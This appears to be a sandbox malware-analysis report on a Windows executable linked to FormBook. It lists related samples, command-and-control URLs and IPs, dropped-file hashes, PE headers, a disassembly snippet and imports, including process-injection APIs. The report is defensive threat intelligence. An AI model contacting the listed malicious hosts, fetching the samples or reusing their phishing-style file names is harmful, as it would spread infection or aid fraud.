Report size exceeded maximum capacity and may have missing disassembly code.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
103.120.80.111	Payment&WarantyBonds.exe	Get hash	malicious	FormBook	Browse	www.cotti.club/3ej6/
	Payment&WarantyBonds.exe	Get hash	malicious	FormBook	Browse	www.cotti.club/3ej6/
	pismo1A 12.06.2024.exe	Get hash	malicious	FormBook	Browse	www.zhuan-tou.com/lx5p/
	CFV20240600121.exe	Get hash	malicious	FormBook	Browse	www.zhuan-tou.com/lx5p/
	BMhDm7YW62.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.633922.com/m858/?yRV=coEloaOWB4ccjb+v6cLGO3+aXUsmpIWjCRRWxfkEZg7Qbr+sYY/0Gc0G57svkQNplbCaP8Xe0B9P1hE+GhuMVBij7PKQzh7NHQ==&GJ=C4IdWhJXSFOXR8D
	Payment_Copy_[SWIFT_COPY].exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.633922.com/m858/
	Invoice_&_SOA_ready_for_dispatch.exe	Get hash	malicious	FormBook	Browse	www.633922.com/udwf/?G0Yxd2Q=EgoyY5F9PuSC7IWgflDFG7vO7ChOxNSXUZQtmoKTqYmDoJiW0KocQ9ej5sZbxdFlzd/pkXvUfPTapOCXwmOa8U5eEphhhK4tvg==&pp=dZa4
	Request_List.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.633922.com/oiwu/?Jz0HU=+L/6O+Q8u+ajcbZGgAmmZd+NMVb04NFrpK29B3gBvKtIEVSU5Z3YQVU7jFSO9jVfLdoVnndqUGYQzkOx6q7e3NvCIXwJmOpdTA==&M4=XF_T
	881SP1exr1.exe	Get hash	malicious	FormBook	Browse	www.lpqxmz.site/4hc5/?ntxh9=V48LzvX0&P6=245SFh9gPs7u7SMvCZq1WQwUtHwLu6OXJLdJjwoxg6CFn9y4LEhCSrC/ms6Ftk+AVu/2
	TT_PAYMENT_SLIP_23AUG2023.doc	Get hash	malicious	FormBook	Browse	www.lpqxmz.site/4hc5/?wL3dPBV0=245SFh9gT8/q7yEoAZq1WQwUtHwLu6OXJLFZ/z0wkaCEnMe+MUwOEv69lJW52EKzavqGKA==&Cxl0M=YN64Xx
208.91.197.27	Pp7OXMFwqhXKx5Y.exe	Get hash	malicious	FormBook	Browse	www.epicurecooks.world/mdkc/
	New Order.exe	Get hash	malicious	FormBook	Browse	www.614genetics.online/n3sn/
	72STaC6BmljfbIQ.exe	Get hash	malicious	FormBook	Browse	www.mohawktooldie.online/e1ut/
	quotation.exe	Get hash	malicious	FormBook	Browse	www.cortisalincontrol.net/cbfz/
	PO_1111101161.vbs	Get hash	malicious	FormBook	Browse	www.guacamask.online/rfhq/
	specifications.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.cortisalincontrol.net/cbfz/
	1k24tbb-00241346.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.joeltcarpenter.online/9pyp/
	ARRIVAL NOTICE.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.cortisalincontrol.net/cbfz/
	W3MzrFzSF0.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.matteicapital.online/hyyd/
	FATURA.exe	Get hash	malicious	FormBook	Browse	www.martaschrimpf.info/qr9f/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
dns.ladipage.com	MAERSK LINE SHIPPING DOC_4253.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	QUOTATON-37839993.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	New Purchase Order.exe	Get hash	malicious	FormBook	Browse	54.179.173.60
	Docs.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	18.139.62.226
	XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	13.228.81.39
	Swift copy.exe	Get hash	malicious	FormBook	Browse	18.139.62.226
	wavjjT3sEq.exe	Get hash	malicious	FormBook	Browse	54.179.173.60
	COMMERCIAL-DOKUMEN-YANG-DIREVISI.exe	Get hash	malicious	FormBook	Browse	18.139.62.226
	Order.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	54.179.173.60
	7v8szLCQAn.exe	Get hash	malicious	FormBook	Browse	54.179.173.60

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://hongkongliving.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.18.33.8
	Hays eft_Receipt number N302143235953.htm	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exe	Get hash	malicious	Poisonivy	Browse	172.67.26.92
	Mozi.m.elf	Get hash	malicious	Mirai	Browse	172.71.119.218
	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	EFT Remittance_(Deerequipment)CQDM.html	Get hash	malicious	Unknown	Browse	104.21.18.132
	https://cbthz04.na1.hs-sales-engage.com/Ctc/WX+23284/cbtHZ04/JlY2-6qcW95jsWP6lZ3mVW5xSkdC387hZlVGwpQc3P-q7wW4XgB4f44hCn1W3xYp5D6c1ttLW5FlJm432C9CFN1DvHyz7sRM3W1xbpQP3rjw57VdgQ8b5y5ncrN49hcz4pvY25W96rvby79_LjyW2hcbt-9lVY_PW61b5ZB17S04cW1Q1Z0m1qr_XnW4-Nvh_3JShBfW6ZlQ2B7-rTd7W5m54Pt4FXHVhN8f7LcVPRggDW6t0wZX12kCc8W8SWxd-65BfMKN89z7Dpr6bFRW62hqfp7800yqW6mjxRN41FPzSV9Cmrg5cL__SW36PjDN1zwkS6W21jP9H8v9kL6W995dJp10hcCRVsGjCC5n0FZjN7sg51mKQ1rDW15tQ1c3HKBShW818lp-6tdDqnf2cjw2s04	Get hash	malicious	Unknown	Browse	104.16.117.116
	https://on-chainevm.pages.dev	Get hash	malicious	HTMLPhisher	Browse	104.16.79.73
	https://vcsfi.kidsavancados.com/	Get hash	malicious	Captcha Phish	Browse	104.21.9.144
	file.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
CLOUDFLARENETUS	https://hongkongliving.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.18.33.8
	Hays eft_Receipt number N302143235953.htm	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exe	Get hash	malicious	Poisonivy	Browse	172.67.26.92
	Mozi.m.elf	Get hash	malicious	Mirai	Browse	172.71.119.218
	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	EFT Remittance_(Deerequipment)CQDM.html	Get hash	malicious	Unknown	Browse	104.21.18.132
	https://cbthz04.na1.hs-sales-engage.com/Ctc/WX+23284/cbtHZ04/JlY2-6qcW95jsWP6lZ3mVW5xSkdC387hZlVGwpQc3P-q7wW4XgB4f44hCn1W3xYp5D6c1ttLW5FlJm432C9CFN1DvHyz7sRM3W1xbpQP3rjw57VdgQ8b5y5ncrN49hcz4pvY25W96rvby79_LjyW2hcbt-9lVY_PW61b5ZB17S04cW1Q1Z0m1qr_XnW4-Nvh_3JShBfW6ZlQ2B7-rTd7W5m54Pt4FXHVhN8f7LcVPRggDW6t0wZX12kCc8W8SWxd-65BfMKN89z7Dpr6bFRW62hqfp7800yqW6mjxRN41FPzSV9Cmrg5cL__SW36PjDN1zwkS6W21jP9H8v9kL6W995dJp10hcCRVsGjCC5n0FZjN7sg51mKQ1rDW15tQ1c3HKBShW818lp-6tdDqnf2cjw2s04	Get hash	malicious	Unknown	Browse	104.16.117.116
	https://on-chainevm.pages.dev	Get hash	malicious	HTMLPhisher	Browse	104.16.79.73
	https://vcsfi.kidsavancados.com/	Get hash	malicious	Captcha Phish	Browse	104.21.9.144
	file.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
COGENT-174US	Mozi.m.elf	Get hash	malicious	Mirai	Browse	154.62.73.236
	http://prntbl.concejomunicipaldechinu.gov.co	Get hash	malicious	Unknown	Browse	154.38.174.3
	Josho.sh4.elf	Get hash	malicious	Unknown	Browse	38.185.182.57
	Josho.ppc.elf	Get hash	malicious	Unknown	Browse	154.39.145.13
	Josho.arm.elf	Get hash	malicious	Unknown	Browse	38.142.117.240
	hax.spc.elf	Get hash	malicious	Mirai	Browse	38.223.114.4
	hax.arm7.elf	Get hash	malicious	Mirai	Browse	154.30.85.89
	hax.mpsl.elf	Get hash	malicious	Mirai	Browse	154.48.160.55
	hax.arm5.elf	Get hash	malicious	Mirai	Browse	154.44.0.198
	hax.ppc.elf	Get hash	malicious	Mirai	Browse	39.0.190.24

Process:	C:\Windows\SysWOW64\ROUTE.EXE
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\autBA2.tmp

Download File

Process:	C:\Users\user\Desktop\CJE003889.exe
File Type:	data
Category:	dropped
Size (bytes):	289280
Entropy (8bit):	7.99453362648521
Encrypted:	true
SSDEEP:	6144:iGlwcrXXJdOecxAlXaxxpR0jrgyhr34n16BQR8sL8lqy:iGxrXXRcxhCjrzB4n1cq8sLjy
MD5:	E9BCA64015D52B78FA2472AEE2060303
SHA1:	C20966F6BA5402A89A9D78DFDAB723A02BB91E07
SHA-256:	A7BB2A9E683868C2F17D66EF1A9E63EC52C3F73F1473C355CD0DAAAD4804E02E
SHA-512:	F158F9835AFF473EE9AB44174101843BD1165F7EEC559930A7728B3150FA980096E86DB8475EB2B1C9F3A8AC87A0B85E909B5E1271089B3E0F5484E14B01808C
Malicious:	false
Reputation:	low
Preview:	\|..VSAKEV92E..AI.PJO91Q2.PAKER92EQOAITPJO91Q2VPAKER92EQOAITP.O91_-.^A.L...D..`.<99oIC>U$1,k&3W\%o#,t"?!.X?....k(=]Wk\BKmTPJO91QKWY.v%5..%6.\|)3.P..kR1.[...R".U..l(.c8Q>m!,.R92EQOAI..JOu0P2....ER92EQOA.TRKD8:Q2.TAKER92EQO!\TPJ_91QBRPAK.R9"EQOCITVJO91Q2VVAKER92EQ?EITRJO91Q2TP..ER)2EAOAIT@JO)1Q2VPA[ER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92E.;$1 PJO.fU2V@AKE.=2EAOAITPJO91Q2VPAkERY2EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQ

C:\Users\user\AppData\Local\Temp\bezzo

Download File

Process:	C:\Users\user\Desktop\CJE003889.exe
File Type:	data
Category:	dropped
Size (bytes):	289280
Entropy (8bit):	7.99453362648521
Encrypted:	true
SSDEEP:	6144:iGlwcrXXJdOecxAlXaxxpR0jrgyhr34n16BQR8sL8lqy:iGxrXXRcxhCjrzB4n1cq8sLjy
MD5:	E9BCA64015D52B78FA2472AEE2060303
SHA1:	C20966F6BA5402A89A9D78DFDAB723A02BB91E07
SHA-256:	A7BB2A9E683868C2F17D66EF1A9E63EC52C3F73F1473C355CD0DAAAD4804E02E
SHA-512:	F158F9835AFF473EE9AB44174101843BD1165F7EEC559930A7728B3150FA980096E86DB8475EB2B1C9F3A8AC87A0B85E909B5E1271089B3E0F5484E14B01808C
Malicious:	false
Preview:	\|..VSAKEV92E..AI.PJO91Q2.PAKER92EQOAITPJO91Q2VPAKER92EQOAITP.O91_-.^A.L...D..`.<99oIC>U$1,k&3W\%o#,t"?!.X?....k(=]Wk\BKmTPJO91QKWY.v%5..%6.\|)3.P..kR1.[...R".U..l(.c8Q>m!,.R92EQOAI..JOu0P2....ER92EQOA.TRKD8:Q2.TAKER92EQO!\TPJ_91QBRPAK.R9"EQOCITVJO91Q2VVAKER92EQ?EITRJO91Q2TP..ER)2EAOAIT@JO)1Q2VPA[ER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92E.;$1 PJO.fU2V@AKE.=2EAOAITPJO91Q2VPAkERY2EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQ

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.211718626867483
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	CJE003889.exe
File size:	1'229'312 bytes
MD5:	701f58c31461426d9dd6fafcd8adcd33
SHA1:	ccdb3a9aec59affb20fb94e62bca9a52c5900618
SHA256:	d33029ee722e3376c49c3a557014f649afe3210c2b400336d9bf39062792dfd0
SHA512:	63dd2ad38c39733f10a585ee6fdbc046e81ba1ece8330ffa57361ae844a0d700981e806c1a1a08b0026fe7601dc1a7f37a2df625845ab772b838f2b33608dc48
SSDEEP:	24576:Lu6J33O0c+JY5UZ+XC0kGso6FafmlSyOCw3BEXAgEVqWY:lu0c++OCvkGs9FafQdwxAAgE7Y
TLSH:	0B45CF2273DDC360CB669273BF6AB7016EBF7C610630B85B2F980D7DA950161162D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6758DDB1 [Wed Dec 11 00:32:49 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F9620EA7E9Ah
jmp 00007F9620E9AC64h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F9620E9ADEAh
cmp edi, eax
jc 00007F9620E9B14Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F9620E9ADE9h
rep movsb
jmp 00007F9620E9B0FCh
cmp ecx, 00000080h
jc 00007F9620E9AFB4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F9620E9ADF0h
bt dword ptr [004BE324h], 01h
jc 00007F9620E9B2C0h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F9620E9AF8Dh
test edi, 00000003h
jne 00007F9620E9AF9Eh
test esi, 00000003h
jne 00007F9620E9AF7Dh
bt edi, 02h
jnc 00007F9620E9ADEFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F9620E9ADF3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F9620E9AE45h
bt esi, 03h
jnc 00007F9620E9AE98h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x6386c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x12b000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x6386c	0x63a00	93a45919492baeac55ea9cad6bf51d28	False	0.933292326693852	data	7.907678801452212	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x12b000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x5ab31	data			1.0003257022112757
RT_GROUP_ICON	0x12a2ec	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x12a364	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x12a378	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x12a38c	0x14	data	English	Great Britain	1.25
RT_VERSION	0x12a3a0	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x12a47c	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, 